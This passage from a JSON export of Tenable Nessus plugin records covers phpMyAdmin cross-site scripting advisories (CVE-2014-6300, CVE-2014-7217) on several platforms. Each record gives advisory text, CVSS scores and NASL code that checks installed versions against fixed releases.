"AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-08-19T12:48:39", "description": "phpMyAdmin 4.2.8.1 (2014-09-13) ===============================\n\n - [security] DOM based XSS that results to a CSRF that creates a ROOT account in certain conditions\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security 
advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Fedora 20 : phpMyAdmin-4.2.8.1-2.fc20 (2014-10981)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6300"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:phpMyAdmin", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-10981.NASL", "href": "https://www.tenable.com/plugins/nessus/77872", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-10981.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77872);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-6300\");\n script_bugtraq_id(69790);\n script_xref(name:\"FEDORA\", value:\"2014-10981\");\n\n script_name(english:\"Fedora 20 : phpMyAdmin-4.2.8.1-2.fc20 (2014-10981)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"phpMyAdmin 4.2.8.1 (2014-09-13) ===============================\n\n - [security] DOM based XSS that results to a CSRF that\n creates a ROOT account in certain conditions\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1141635\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-September/138655.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?601dc179\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"phpMyAdmin-4.2.8.1-2.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-04-16T14:10:22", "description": "According to its self-reported version number, the phpMyAdmin application hosted on the remote web server is 4.0.x prior to 4.0.10.4, 4.1.x prior to 4.1.14.5, or 4.2.x prior to 4.2.9.1. It is, therefore, affected by an input validation error related to the 'ENUM' value and the files 'libraries/TableSearch.class.php' and 'libraries/Util.class.php'. 
This issue could allow cross-site scripting attacks.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": null, "vector": null}, "published": "2014-10-10T00:00:00", "type": "nessus", "title": "phpMyAdmin 4.0.x < 4.0.10.4 / 4.1.x < 4.1.14.5 / 4.2.x < 4.2.9.1 'ENUM' Value XSS (PMASA-2014-11)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7217"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:phpmyadmin:phpmyadmin"], "id": "PHPMYADMIN_PMASA_2014_11.NASL", "href": "https://www.tenable.com/plugins/nessus/78233", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78233);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2014-7217\");\n script_bugtraq_id(70252);\n\n script_name(english:\"phpMyAdmin 4.0.x < 4.0.10.4 / 4.1.x < 4.1.14.5 / 4.2.x < 4.2.9.1 'ENUM' Value XSS (PMASA-2014-11)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a PHP application that is affected by a\ncross-site scripting vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the phpMyAdmin\napplication hosted on the remote web server is 4.0.x prior to\n4.0.10.4, 4.1.x prior to 4.1.14.5, or 4.2.x prior to 4.2.9.1. It is,\ntherefore, affected by an input validation error related to the 'ENUM'\nvalue and the files 'libraries/TableSearch.class.php' and\n'libraries/Util.class.php'. 
This issue could allow cross-site\nscripting attacks.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2014-11.php\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/c6c77589a5860f20b5fb335033389de50e1a9031\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d26560ae\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/71ccbbc423bcfd14ba40174b3adcd9a0fafaa511\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2a404b70\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/c1a3f85fbd1a9569646e7cf1b791325ae82c7961\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?68163849\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/304fb2b645b36a39e03b954fdbd567173ebe6448\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a0a07dda\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to phpMyAdmin 4.0.10.4 / 4.1.14.5 / 4.2.9.1 or later, or apply\nthe patches from the referenced links.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/10\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n 
script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:phpmyadmin:phpmyadmin\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses : XSS\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"phpMyAdmin_detect.nasl\");\n script_require_keys(\"www/PHP\", \"www/phpMyAdmin\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nappname = \"phpMyAdmin\";\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_install_from_kb(appname:appname, port:port, exit_on_fail:TRUE);\ndir = install['dir'];\nurl = build_url(qs:dir, port:port);\nversion = install['ver'];\n\nif (version == UNKNOWN_VER) audit(AUDIT_UNKNOWN_WEB_APP_VER, appname, url);\nif (version =~ \"^4(\\.[012])?$\") audit(AUDIT_VER_NOT_GRANULAR, appname, port, version);\nif (version !~ \"^4\\.[012][^0-9]\") audit(AUDIT_WEB_APP_NOT_INST, appname + \" 4.0.x / 4.1.x / 4.2.x\", port);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nre = make_array(\n -2, \"-beta(\\d+)\",\n -1, \"-rc(\\d+)\"\n);\n\n# Affected version\n# 4.0.x < 4.0.10.4\n# 4.1.x < 4.1.14.5\n# 4.2.x < 4.2.9.1\ncut_off = NULL;\nfixed_ver = NULL;\n\nif (version =~ \"^4\\.0\\.\")\n{\n cut_off = '4.0.0';\n fixed_ver = '4.0.10.4';\n}\n\nif (version =~ \"^4\\.1\\.\")\n{\n cut_off = '4.1.0';\n fixed_ver = '4.1.14.5';\n}\n\nif (version =~ \"^4\\.2\\.\")\n{\n cut_off = '4.2.0';\n fixed_ver = '4.2.9.1';\n}\n\n# The following should never happen at this\n# point, but best to be safe and check anyway.\nif (isnull(cut_off) || isnull(fixed_ver))\n audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, url, 
version);\n\nif (\n ver_compare(ver:version, fix:cut_off, regexes:re) >= 0 &&\n ver_compare(ver:version, fix:fixed_ver, regexes:re) == -1\n)\n{\n set_kb_item(name:'www/'+port+'/XSS', value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_ver +\n '\\n';\n security_note(port:port, extra:report);\n }\n else security_note(port);\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, url, version);\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-08-19T12:48:03", "description": "Versions of phpMyAdmin earlier than 4.0.10.4, 4.1.14.5, and 4.2.9.1 are unpatched for cross-site scripting vulnerabilities affecting the table search and table structure pages. These vulnerabilities can be leveraged to steal cookie-based authentication, among other potential attacks, though note that they can only be leveraged by a logged-in user.", "cvss3": {"score": 3.7, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"}, "published": "2014-10-06T00:00:00", "type": "nessus", "title": "phpMyAdmin 4.0.x < 4.0.10.4 / 4.1.x < 4.1.14.5 / 4.2.x < 4.2.9.1 Multiple XSS (PMASA-2014-11)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7217"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:*"], "id": "8542.PRM", "href": "https://www.tenable.com/plugins/nnm/8542", "sourceData": "Binary data 8542.prm", "cvss": {"score": 4.3, "vector": "CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-08-19T12:48:19", "description": "phpMyAdmin was updated fix a security issues [CVE-2014-7217] This update contains a fix for a cross-site scripting vulnerability in the table search and table structure pages which could be trigged with a crafted ENUM value.", "cvss3": {"score": null, "vector": null}, "published": "2014-10-10T00:00:00", "type": "nessus", "title": "openSUSE Security Update : phpMyAdmin 
(openSUSE-SU-2014:1280-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7217"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:phpMyAdmin", "cpe:/o:novell:opensuse:12.3", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2014-581.NASL", "href": "https://www.tenable.com/plugins/nessus/78118", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-581.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78118);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-7217\");\n\n script_name(english:\"openSUSE Security Update : phpMyAdmin (openSUSE-SU-2014:1280-1)\");\n script_summary(english:\"Check for the openSUSE-2014-581 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"phpMyAdmin was updated fix a security issues [CVE-2014-7217] This\nupdate contains a fix for a cross-site scripting vulnerability in the\ntable search and table structure pages which could be trigged with a\ncrafted ENUM value.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=899452\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2014-10/msg00009.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3|SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3 / 13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"phpMyAdmin-4.1.14.5-1.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"phpMyAdmin-4.1.14.5-16.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-08-19T12:48:33", "description": "The phpMyAdmin development team reports :\n\nWith a crafted ENUM value it is possible to 
trigger an XSS in table search and table structure pages. This vulnerability can be triggered only by someone who is logged in to phpMyAdmin, as the usual token protection prevents non-logged-in users from accessing the required pages.", "cvss3": {"score": null, "vector": null}, "published": "2014-10-02T00:00:00", "type": "nessus", "title": "FreeBSD : phpMyAdmin -- XSS vulnerabilities (3e8b7f8a-49b0-11e4-b711-6805ca0b3d42)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7217"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:phpMyAdmin", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_3E8B7F8A49B011E4B7116805CA0B3D42.NASL", "href": "https://www.tenable.com/plugins/nessus/78015", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78015);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-7217\");\n\n script_name(english:\"FreeBSD : phpMyAdmin -- XSS vulnerabilities (3e8b7f8a-49b0-11e4-b711-6805ca0b3d42)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The phpMyAdmin development team reports :\n\nWith a crafted ENUM value it is possible to trigger an XSS in table\nsearch and table structure pages. 
This vulnerability can be triggered\nonly by someone who is logged in to phpMyAdmin, as the usual token\nprotection prevents non-logged-in users from accessing the required\npages.\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2014-11.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2014-11/\"\n );\n # https://vuxml.freebsd.org/freebsd/3e8b7f8a-49b0-11e4-b711-6805ca0b3d42.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ec91c838\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"phpMyAdmin>=4.2.0<4.2.9.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:pkg_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-08-19T12:48:15", "description": "phpMyAdmin 4.2.9.1 (2014-10-01) ===============================\n\n - [security] XSS vulnerabilities in table search and table structure pages\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-10-09T00:00:00", "type": "nessus", "title": "Fedora 21 : phpMyAdmin-4.2.9.1-1.fc21 (2014-11978)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7217"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:phpMyAdmin", "cpe:/o:fedoraproject:fedora:21"], "id": "FEDORA_2014-11978.NASL", "href": "https://www.tenable.com/plugins/nessus/78101", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-11978.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78101);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-7217\");\n script_bugtraq_id(70252);\n script_xref(name:\"FEDORA\", value:\"2014-11978\");\n\n script_name(english:\"Fedora 21 : phpMyAdmin-4.2.9.1-1.fc21 (2014-11978)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"phpMyAdmin 4.2.9.1 (2014-10-01) ===============================\n\n - [security] XSS vulnerabilities in table search and table\n structure pages\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1148664\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-October/140170.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f77b7415\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"phpMyAdmin-4.2.9.1-1.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-08-19T12:48:06", "description": "phpMyAdmin 4.2.9.1 (2014-10-01) ===============================\n\n - [security] XSS vulnerabilities in table search and table structure pages\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
